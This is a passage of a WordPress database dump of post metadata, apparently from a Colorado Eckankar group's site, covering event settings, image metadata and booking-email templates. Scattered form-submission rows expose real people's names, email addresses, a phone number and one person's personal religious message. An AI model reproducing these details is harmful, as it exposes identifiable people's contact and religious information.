Colorado\";i:2;s:8:\"Loveland\";}'),(147693,265728,'_form_id','21'),(147694,265728,'_seq_num','134'),(147729,247330,'_wp_old_date','2021-09-07'),(147731,247336,'_wp_old_date','2021-09-07'),(147733,265030,'_wp_old_date','2021-09-07'),(147735,264903,'_wp_old_date','2021-09-07'),(147737,264902,'_wp_old_date','2021-09-07'),(147739,264901,'_wp_old_date','2021-09-07'),(147745,247342,'_wp_old_date','2021-09-07'),(147747,261921,'_wp_old_date','2021-09-07'),(147749,247343,'_wp_old_date','2021-09-07'),(147751,247344,'_wp_old_date','2021-09-07'),(147755,247345,'_wp_old_date','2021-09-07'),(177214,267955,'mec_ticket_id',',1,'),(177215,267955,'mec_booking_time','2023-02-12 11:18:08'),(147765,247332,'_wp_old_date','2021-09-07'),(179387,268208,'mec_repeat_status','0'),(179375,268208,'mec_countdown_method','global'),(179361,268208,'mec_more_info_target','_self'),(179339,268201,'smush-info','The file was compressed from 21.11 KB to 8.41 KB saving 60.14 percent using WP-Optimize'),(179340,268201,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:21615;s:12:\"smushed-size\";i:8616;s:15:\"savings-percent\";d:60.14;s:10:\"sizes-info\";a:6:{s:4:\"full\";a:2:{s:8:\"original\";i:21615;s:10:\"compressed\";i:8616;}s:6:\"medium\";a:2:{s:8:\"original\";i:11540;s:10:\"compressed\";i:5607;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6359;s:10:\"compressed\";i:3169;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:12505;s:10:\"compressed\";i:5505;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:19270;s:10:\"compressed\";i:8037;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:16298;s:10:\"compressed\";i:6852;}}}'),(147806,265736,'_wp_attached_file','2021/10/hp-fall-bk-1-edit-1.jpg'),(147807,265736,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:825;s:4:\"file\";s:31:\"2021/10/hp-fall-bk-1-edit-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"hp-fall-bk-1-edit-1-300x129.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:129;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"hp-fall-bk-1-edit-1-1024x440.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"hp-fall-bk-1-edit-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"hp-fall-bk-1-edit-1-768x330.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:330;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:31:\"hp-fall-bk-1-edit-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:31:\"hp-fall-bk-1-edit-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:31:\"hp-fall-bk-1-edit-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:31:\"hp-fall-bk-1-edit-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"hp-fall-bk-1-edit-1-1536x660.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"hp-fall-bk-1-edit-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(151179,266036,'smush-complete','1'),(151178,266036,'original-file','2021/11/hu-wooden-1-updraft-pre-smush-original.jpg'),(148139,265758,'mec_event_status','EventScheduled'),(148140,265758,'mec_moved_online_link',''),(148141,265758,'mec_cancelled_reason',''),(148142,265758,'mec_display_cancellation_reason_in_single_page',''),(148143,265758,'protect_children',''),(148144,265758,'passster_activate_global_protection',NULL),(148145,265758,'passster_activate_protection',NULL),(148146,265758,'passster_protection_type','password'),(148147,265758,'boldgrid_hide_page_title','0'),(148148,265758,'_thumbnail_id','265855'),(147906,265743,'_seq_num','9'),(147907,265744,'protect_children',''),(147908,265744,'_field_402','test2'),(147909,265744,'_field_403','testing'),(147910,265744,'_field_404','cm.holliday@comcast.net'),(147911,265744,'_form_id','44'),(147912,265744,'_seq_num','10'),(147913,265745,'protect_children',''),(147914,265745,'_wp_page_template','default'),(147915,265745,'passster_activate_protection',NULL),(147916,265745,'passster_protection_type','password'),(147917,265745,'boldgrid_hide_page_title','0'),(147918,265745,'boldgrid_in_page_containers','1'),(147919,265745,'bgseo_robots_index','index'),(147920,265745,'bgseo_robots_follow','follow'),(147921,265745,'_dp_original','263883'),(147922,265745,'_edit_lock','1634602996:2'),(147923,265745,'_edit_last','2'),(147924,265745,'passster_activate_global_protection',NULL),(147925,265750,'protect_children',''),(147926,265750,'_field_402','test3'),(147927,265750,'_field_403','testing'),(147928,265750,'_field_404','cm.holliday@comcast.net'),(147929,265750,'_form_id','44'),(147930,265750,'_seq_num','11'),(147931,265751,'protect_children',''),(147932,265751,'_field_402','test5'),(147933,265751,'_field_403','testing'),(147934,265751,'_field_404','choll.03@comcast.net'),(147935,265751,'_form_id','44'),(147936,265751,'_seq_num','12'),(161337,266657,'_edit_lock','1653335364:2'),(161338,266657,'_edit_last','2'),(161339,266658,'_wp_attached_file','2022/05/Karma.webp'),(161340,266658,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:18:\"2022/05/Karma.webp\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"Karma-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Karma-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:18:\"Karma-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:18:\"Karma-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:18:\"Karma-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:18:\"Karma-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(161335,266657,'boldgrid_in_page_containers','1'),(161336,266657,'_dp_original','266104'),(161333,266657,'passster_protection_type','password'),(161332,266657,'passster_activate_protection',NULL),(161331,266657,'passster_activate_global_protection',NULL),(151853,266081,'mec_display_cancellation_reason_in_single_page',''),(161330,266657,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(161329,266657,'boldgrid_hide_page_title','0'),(161328,266657,'mec_display_cancellation_reason_in_single_page',''),(161327,266657,'mec_cancelled_reason',''),(161326,266657,'mec_moved_online_link',''),(161325,266657,'mec_event_status','EventScheduled'),(161324,266657,'mec_fields','a:0:{}'),(161323,266657,'mec_op','a:0:{}'),(161322,266657,'mec_bfixed_fields','a:0:{}'),(161321,266657,'mec_reg_fields','a:0:{}'),(161320,266657,'mec_reg_fields_global_inheritance','1'),(161317,266657,'mec_fees','a:0:{}'),(161318,266657,'mec_ticket_variations_global_inheritance','1'),(161319,266657,'mec_ticket_variations','a:0:{}'),(161315,266657,'mec_tickets','a:0:{}'),(161316,266657,'mec_fees_global_inheritance','1'),(148134,265758,'mec_reg_fields','a:0:{}'),(148135,265758,'mec_bfixed_fields','a:0:{}'),(148136,265758,'mec_op','a:0:{}'),(148137,265758,'mec_fields','a:0:{}'),(148138,265758,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(148132,265758,'mec_ticket_variations','a:0:{}'),(148133,265758,'mec_reg_fields_global_inheritance','1'),(148131,265758,'mec_ticket_variations_global_inheritance','1'),(148130,265758,'mec_fees','a:0:{}'),(148129,265758,'mec_fees_global_inheritance','1'),(148128,265758,'mec_tickets','a:0:{}'),(148127,265758,'mec_booking','a:0:{}'),(148126,265758,'mec_hourly_schedules','a:0:{}'),(148125,265758,'mec_not_in_days',''),(148124,265758,'mec_in_days',''),(148123,265758,'mec_advanced_days','a:0:{}'),(148122,265758,'mec_repeat_end_at_date',''),(148121,265758,'mec_repeat_end_at_occurrences',''),(148120,265758,'mec_repeat_end',''),(148119,265758,'mec_repeat_interval','1'),(148118,265758,'mec_repeat_type',''),(148117,265758,'mec_repeat_status','0'),(148116,265758,'mec_end_day_seconds','84600'),(148115,265758,'mec_end_time_ampm','PM'),(148114,265758,'mec_end_time_minutes','30'),(148113,265758,'mec_end_time_hour','11'),(148112,265758,'mec_end_date','2021-11-14'),(148111,265758,'mec_start_day_seconds','37800'),(148110,265758,'mec_start_time_ampm','AM'),(148109,265758,'mec_start_time_minutes','30'),(148108,265758,'mec_start_time_hour','10'),(148107,265758,'mec_start_date','2021-11-14'),(148106,265758,'mec_public','1'),(148105,265758,'mec_countdown_method','global'),(148104,265758,'mec_timezone','global'),(148093,265758,'mec_currency','a:0:{}'),(148094,265758,'mec_additional_organizer_ids','a:0:{}'),(148095,265758,'mec_additional_location_ids','a:0:{}'),(148096,265758,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-14\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-14\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(148097,265758,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(148098,265758,'mec_certain_weekdays','a:0:{}'),(148099,265758,'mec_allday','0'),(148100,265758,'one_occurrence','0'),(148101,265758,'mec_hide_time','0'),(148102,265758,'mec_hide_end_time','0'),(148103,265758,'mec_comment',''),(148092,265758,'mec_cost',''),(148091,265758,'mec_more_info_target','_self'),(148090,265758,'mec_more_info_title',''),(148089,265758,'mec_more_info',''),(148088,265758,'mec_read_more',''),(148087,265758,'mec_organizer_id','1'),(148086,265758,'mec_dont_show_map','0'),(148083,265758,'_edit_last','2'),(148084,265758,'mec_color',''),(148085,265758,'mec_location_id','122'),(148082,265758,'_edit_lock','1635709771:2'),(148081,265681,'_thumbnail_id','265136'),(148197,265765,'_field_224','Stacey'),(148198,265765,'_field_225','W'),(148199,265765,'_field_226','shaktiflow@gmail.com'),(148200,265765,'_field_227','CO'),(148201,265765,'_field_228','US'),(148202,265765,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(148203,265765,'_form_id','21'),(148204,265765,'_seq_num','135'),(148213,265767,'_field_224','Jean'),(148214,265767,'_field_225','Davis'),(148215,265767,'_field_226','jean5030@gmail.com'),(148216,265767,'_field_227','CO'),(148217,265767,'_field_228','US'),(148218,265767,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(148219,265767,'_form_id','21'),(148220,265767,'_seq_num','136'),(148221,265768,'_field_450','Steven'),(148222,265768,'_field_451','Louscher'),(148223,265768,'_field_458','19706691177'),(148224,265768,'_field_452','lea8654@juno.com'),(148225,265768,'_field_453','please contact me'),(148226,265768,'_field_454','contact me'),(148227,265768,'_form_id','49'),(148228,265768,'_seq_num','3'),(148229,265782,'_field_179','James'),(148230,265782,'_field_180','DeLong'),(148231,265782,'_field_181','jdelongjr@gmail.com'),(148232,265782,'_field_182','CO'),(148233,265782,'_field_183','US'),(148234,265782,'_field_184','a:1:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(148235,265782,'_form_id','17'),(148236,265782,'_seq_num','7'),(148261,265787,'_field_402','Cheryl'),(148262,265787,'_field_403','Coffey'),(148263,265787,'_field_404','gunnisoncoach@live.com'),(148264,265787,'_form_id','44'),(148265,265787,'_seq_num','13'),(148266,265788,'_edit_lock','1635275643:2'),(148267,265788,'_edit_last','2'),(148268,265788,'passster_activate_global_protection',NULL),(148269,265788,'passster_activate_protection',NULL),(148270,265788,'passster_protection_type','password'),(149126,265869,'mec_moved_online_link',''),(148282,265788,'mec_location_id','0'),(148283,265788,'mec_additional_location_ids','a:0:{}'),(148284,265788,'mec_organizer_id','0'),(148285,265788,'mec_additional_organizer_ids','a:0:{}'),(148286,265788,'protect_children',''),(169069,267185,'mec_dont_show_map','0'),(169070,267185,'mec_organizer_id','1'),(169071,267185,'mec_read_more',''),(169072,267185,'mec_more_info',''),(169067,267185,'mec_color',''),(169068,267185,'mec_location_id','118'),(169066,267185,'protect_children',''),(169065,267183,'_seq_num','115'),(169064,267183,'_form_id','13'),(151189,266038,'_form_id','51'),(151190,266038,'_seq_num','6'),(149129,265869,'boldgrid_hide_page_title','0'),(148329,265801,'_edit_lock','1635275497:2'),(148330,265801,'_edit_last','2'),(148331,265801,'passster_activate_global_protection',NULL),(148332,265801,'passster_activate_protection',NULL),(148333,265801,'passster_protection_type','password'),(148337,265803,'_edit_lock','1635275617:2'),(148338,265803,'_edit_last','2'),(148339,265803,'passster_activate_global_protection',NULL),(148340,265803,'passster_activate_protection',NULL),(148341,265803,'passster_protection_type','password'),(148342,265805,'_edit_lock','1635277742:2'),(148343,265805,'_edit_last','2'),(148344,265805,'passster_activate_global_protection',NULL),(148345,265805,'passster_activate_protection',NULL),(148346,265805,'passster_protection_type','password'),(149128,265869,'mec_display_cancellation_reason_in_single_page',''),(148424,265830,'_seq_num','10'),(148425,265831,'mec_moved_online_link',''),(148426,265831,'mec_cancelled_reason',''),(148427,265831,'mec_display_cancellation_reason_in_single_page',''),(148428,265831,'boldgrid_hide_page_title','0'),(148429,265831,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(148430,265831,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-10-28\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-10-28\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(148431,265831,'mec_currency','a:0:{}'),(148432,265831,'mec_additional_organizer_ids','a:0:{}'),(148433,265831,'mec_additional_location_ids','a:0:{}'),(148434,265831,'mec_cost',''),(148435,265831,'mec_more_info_target','_self'),(148436,265831,'mec_more_info_title',''),(148437,265831,'mec_organizer_id','1'),(148438,265831,'mec_read_more',''),(148439,265831,'mec_more_info',''),(148440,265831,'mec_repeat_type',''),(148441,265831,'mec_repeat_status','0'),(148442,265831,'mec_end_day_seconds','70200'),(148359,7162,'passster_activate_global_protection',NULL),(148360,7162,'passster_activate_protection',NULL),(148361,7162,'passster_protection_type','password'),(148362,265736,'original-file','2021/10/hp-fall-bk-1-edit-1-updraft-pre-smush-original.jpg'),(148363,265736,'smush-complete','1'),(148364,265736,'smush-info','The file was compressed from 479.51 KB to 454.07 KB saving 5.31 percent using WP-Optimize'),(148365,265736,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:491022;s:12:\"smushed-size\";i:464971;s:15:\"savings-percent\";d:5.30999999999999960920149533194489777088165283203125;}'),(148414,265829,'_field_134','Isley'),(148415,265829,'_field_135','visionaryexpression@gmail.com'),(148416,265829,'_field_137','Getting my Satsang class registration right'),(148417,265829,'_field_138','A day or 2 ago, I logged in here and and signed up for the Soul Travel 1 series. After getting other direction from the Mahanta in the last 24 hours, I know that I must sign up for Satsang with my current Soul Travel 2 discourses. I’m sorry for any confusion I’ve caused. Please remove my registration for Soul Travel 1. I really need to be in Soul Travel 2. \n\nMany blessings,\nNiara Isley'),(148413,265829,'_field_133','Niara'),(149127,265869,'mec_cancelled_reason',''),(151188,266038,'_field_476','hospiceallembe@gmail.com'),(148378,265818,'_wp_attached_file','2021/10/rockies-4.jpg'),(148379,265818,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:849;s:4:\"file\";s:21:\"2021/10/rockies-4.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"rockies-4-300x133.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"rockies-4-1024x453.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"rockies-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"rockies-4-768x340.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:21:\"rockies-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:21:\"rockies-4-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:21:\"rockies-4-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:21:\"rockies-4-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"rockies-4-1536x679.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:679;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"rockies-4-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(148380,265818,'original-file','2021/10/rockies-4-updraft-pre-smush-original.jpg'),(148381,265818,'smush-complete','1'),(148382,265818,'smush-info','The file was compressed from 493.04 KB to 429.31 KB saving 12.93 percent using WP-Optimize'),(148383,265818,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:504878;s:12:\"smushed-size\";i:439613;s:15:\"savings-percent\";d:12.92999999999999971578290569595992565155029296875;}'),(148423,265830,'_form_id','48'),(148422,265830,'_field_448','teamskidmore@gmail.com'),(148420,265830,'_field_446','Shauncie'),(148421,265830,'_field_447','Skidmore'),(148418,265829,'_form_id','13'),(148419,265829,'_seq_num','87'),(148443,265831,'mec_end_time_ampm','PM'),(148444,265831,'mec_end_time_minutes','30'),(148445,265831,'mec_end_time_hour','7'),(148446,265831,'mec_end_date','2021-10-28'),(148447,265831,'mec_start_day_seconds','66600'),(148448,265831,'mec_start_time_ampm','PM'),(148449,265831,'mec_start_time_minutes','30'),(148450,265831,'mec_public','1'),(148451,265831,'mec_start_date','2021-10-28'),(148452,265831,'mec_start_time_hour','6'),(148453,265831,'mec_countdown_method','global'),(148454,265831,'mec_timezone','global'),(148455,265831,'mec_comment',''),(148456,265831,'one_occurrence','0'),(148457,265831,'mec_hide_time','0'),(148458,265831,'mec_hide_end_time','0'),(148459,265831,'mec_event_status','EventScheduled'),(148460,265831,'mec_fields','a:0:{}'),(148461,265831,'mec_op','a:0:{}'),(148462,265831,'mec_bfixed_fields','a:0:{}'),(148463,265831,'mec_reg_fields','a:0:{}'),(148464,265831,'mec_reg_fields_global_inheritance','1'),(148465,265831,'mec_ticket_variations','a:0:{}'),(148466,265831,'mec_ticket_variations_global_inheritance','1'),(148467,265831,'mec_fees','a:0:{}'),(148468,265831,'mec_booking','a:0:{}'),(148469,265831,'mec_tickets','a:0:{}'),(148470,265831,'mec_fees_global_inheritance','1'),(148471,265831,'mec_hourly_schedules','a:0:{}'),(148472,265831,'mec_not_in_days',''),(148473,265831,'mec_in_days',''),(148474,265831,'mec_repeat_end_at_date',''),(148475,265831,'mec_advanced_days','a:0:{}'),(148476,265831,'passster_protection_type','password'),(148477,265831,'passster_activate_global_protection',NULL),(148478,265831,'passster_activate_protection',NULL),(148479,265831,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(148480,265831,'mec_repeat_end_at_occurrences',''),(148481,265831,'mec_repeat_end',''),(148482,265831,'mec_repeat_interval','1'),(148483,265831,'mec_allday','0'),(148484,265831,'mec_certain_weekdays','a:0:{}'),(148485,265831,'mec_dont_show_map','0'),(148486,265831,'mec_location_id','122'),(148487,265831,'mec_color',''),(148488,265831,'protect_children',''),(148489,265831,'_edit_lock','1642523306:2'),(148490,265831,'_edit_last','2'),(153011,266177,'mec_moved_online_link',''),(148492,265832,'mec_moved_online_link',''),(148493,265832,'mec_cancelled_reason',''),(148494,265832,'mec_display_cancellation_reason_in_single_page',''),(148495,265832,'boldgrid_hide_page_title','0'),(148496,265832,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(148497,265832,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-17\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-17\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(148498,265832,'mec_currency','a:0:{}'),(148499,265832,'mec_additional_organizer_ids','a:0:{}'),(148500,265832,'mec_additional_location_ids','a:0:{}'),(148501,265832,'mec_cost',''),(148502,265832,'mec_more_info_target','_self'),(148503,265832,'mec_more_info_title',''),(148504,265832,'mec_organizer_id','1'),(148505,265832,'mec_read_more',''),(148506,265832,